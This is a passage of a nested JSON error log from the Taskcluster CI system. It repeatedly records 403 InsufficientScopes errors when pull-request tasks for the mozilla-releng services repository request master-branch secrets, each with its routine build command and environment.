\\\"La0\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"ddcbdbb99491947b6efdcebed5392debf43921f2\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"bastien@nextcairn.com\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T13:09:59.321Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T13:09:59.321Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"KlSSpq8IS6uTkhyZQ7zKLg\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T13:09:59.321Z\\\"\\n}\\n  time:     2016-09-23T13:10:00.461Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"VuswG5NOSAmEyJlk05WfNg\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"shipit_dashboard\\\",\\n    \\\"description\\\": \\\"Test, build and deploy shipit_dashboard\\\",\\n    \\\"owner\\\": \\\"bastien@nextcairn.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/shipit_dashboard\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"shipit_dashboard\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.closed\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 59,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/La0/mozilla-relengapi.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"La0\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"ddcbdbb99491947b6efdcebed5392debf43921f2\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"bastien@nextcairn.com\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T13:09:59.321Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T13:09:59.321Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"KlSSpq8IS6uTkhyZQ7zKLg\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T13:09:59.321Z\\\"\\n}\\n  time:     2016-09-23T13:10:00.461Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"VuswG5NOSAmEyJlk05WfNg\"\n                },\n                \"payload\": {\n                    \"metadata\": {\n                        \"name\": \"shipit_dashboard\",\n                        \"description\": \"Test, build and deploy shipit_dashboard\",\n                        \"owner\": \"bastien@nextcairn.com\",\n                        \"source\": \"https://github.com/mozilla-releng/services/tree/master/src/shipit_dashboard\"\n                    },\n                    \"scopes\": [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.*\",\n                                \"push\"\n                            ],\n                            \"branches\": [\n                                \"master\"\n                            ]\n                        }\n                    },\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"payload\": {\n                        \"maxRunTime\": 7200,\n                        \"image\": \"nixos/nix:latest\",\n                        \"features\": {\n                            \"taskclusterProxy\": true\n                        },\n                        \"env\": {\n                            \"APP\": \"shipit_dashboard\",\n                            \"TASKCLUSTER_SECRETS\": \"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\",\n                            \"GITHUB_EVENT\": \"pull_request.closed\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_PULL_REQUEST\": 59,\n                            \"GITHUB_BASE_REPO_URL\": \"https://github.com/mozilla-releng/services.git\",\n                            \"GITHUB_BASE_USER\": \"mozilla-releng\",\n                            \"GITHUB_BASE_SHA\": \"c70e3321a3d31f95036588c14dfafc3a0ea581f3\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_BASE_REF\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/La0/mozilla-relengapi.git\",\n                            \"GITHUB_HEAD_USER\": \"La0\",\n                            \"GITHUB_HEAD_SHA\": \"ddcbdbb99491947b6efdcebed5392debf43921f2\",\n                            \"GITHUB_HEAD_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"bastien@nextcairn.com\"\n                        },\n                        \"command\": [\n                            \"/bin/bash\",\n                            \"-c\",\n                            \"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\"\n                        ]\n                    },\n                    \"created\": \"2016-09-23T13:09:59.321Z\",\n                    \"deadline\": \"2016-09-24T13:09:59.321Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"KlSSpq8IS6uTkhyZQ7zKLg\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"routes\": [],\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"tags\": {},\n                    \"expires\": \"2017-09-24T13:09:59.321Z\"\n                },\n                \"time\": \"2016-09-23T13:10:00.461Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-releng/services:pull-request\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:route:index.garbage.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    },\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"BHaKjzdcTqupwGo0f-Luvg\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"shipit_frontend\\\",\\n    \\\"description\\\": \\\"Test, build and deploy shipit_frontend\\\",\\n    \\\"owner\\\": \\\"bastien@nextcairn.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/shipit_frontend\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"shipit_frontend\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.closed\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 59,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/La0/mozilla-relengapi.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"La0\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"ddcbdbb99491947b6efdcebed5392debf43921f2\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"bastien@nextcairn.com\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T13:09:59.321Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T13:09:59.321Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"KlSSpq8IS6uTkhyZQ7zKLg\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T13:09:59.321Z\\\"\\n}\\n  time:     2016-09-23T13:10:00.472Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"BHaKjzdcTqupwGo0f-Luvg\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"shipit_frontend\\\",\\n    \\\"description\\\": \\\"Test, build and deploy shipit_frontend\\\",\\n    \\\"owner\\\": \\\"bastien@nextcairn.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/shipit_frontend\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"shipit_frontend\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.closed\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 59,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/La0/mozilla-relengapi.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"La0\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"ddcbdbb99491947b6efdcebed5392debf43921f2\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"bastien@nextcairn.com\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T13:09:59.321Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T13:09:59.321Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"KlSSpq8IS6uTkhyZQ7zKLg\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T13:09:59.321Z\\\"\\n}\\n  time:     2016-09-23T13:10:00.472Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"BHaKjzdcTqupwGo0f-Luvg\"\n                },\n                \"payload\": {\n                    \"metadata\": {\n                        \"name\": \"shipit_frontend\",\n                        \"description\": \"Test, build and deploy shipit_frontend\",\n                        \"owner\": \"bastien@nextcairn.com\",\n                        \"source\": \"https://github.com/mozilla-releng/services/tree/master/src/shipit_frontend\"\n                    },\n                    \"scopes\": [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.*\",\n                                \"push\"\n                            ],\n                            \"branches\": [\n                                \"master\"\n                            ]\n                        }\n                    },\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"payload\": {\n                        \"maxRunTime\": 7200,\n                        \"image\": \"nixos/nix:latest\",\n                        \"features\": {\n                            \"taskclusterProxy\": true\n                        },\n                        \"env\": {\n                            \"APP\": \"shipit_frontend\",\n                            \"TASKCLUSTER_SECRETS\": \"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\",\n                            \"GITHUB_EVENT\": \"pull_request.closed\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_PULL_REQUEST\": 59,\n                            \"GITHUB_BASE_REPO_URL\": \"https://github.com/mozilla-releng/services.git\",\n                            \"GITHUB_BASE_USER\": \"mozilla-releng\",\n                            \"GITHUB_BASE_SHA\": \"c70e3321a3d31f95036588c14dfafc3a0ea581f3\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_BASE_REF\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/La0/mozilla-relengapi.git\",\n                            \"GITHUB_HEAD_USER\": \"La0\",\n                            \"GITHUB_HEAD_SHA\": \"ddcbdbb99491947b6efdcebed5392debf43921f2\",\n                            \"GITHUB_HEAD_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"bastien@nextcairn.com\"\n                        },\n                        \"command\": [\n                            \"/bin/bash\",\n                            \"-c\",\n                            \"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\"\n                        ]\n                    },\n                    \"created\": \"2016-09-23T13:09:59.321Z\",\n                    \"deadline\": \"2016-09-24T13:09:59.321Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"KlSSpq8IS6uTkhyZQ7zKLg\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"routes\": [],\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"tags\": {},\n                    \"expires\": \"2017-09-24T13:09:59.321Z\"\n                },\n                \"time\": \"2016-09-23T13:10:00.472Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-releng/services:pull-request\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:route:index.garbage.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    },\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"U4IF_XlmRFiFZc68iIhz0A\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"releng_docs\\\",\\n    \\\"description\\\": \\\"Test, build and deploy releng_docs\\\",\\n    \\\"owner\\\": \\\"bastien@nextcairn.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/releng_docs\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"releng_docs\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.closed\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 59,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c70e3321a3d31f95036588c14dfafc3a0ea581f3\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/La0/mozilla-relengapi.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"La0\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"ddcbdbb99491947b6efdcebed5392debf43921f2\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"bastien@nextcairn.com\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-23T13:09:59.319Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-24T13:09:59.319Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"KlSSpq8IS6uTkhyZQ7zKLg\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-24T13:09:59.319Z\\\"\\n}\\n  time:     2016-09-23T13:10:00.475Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 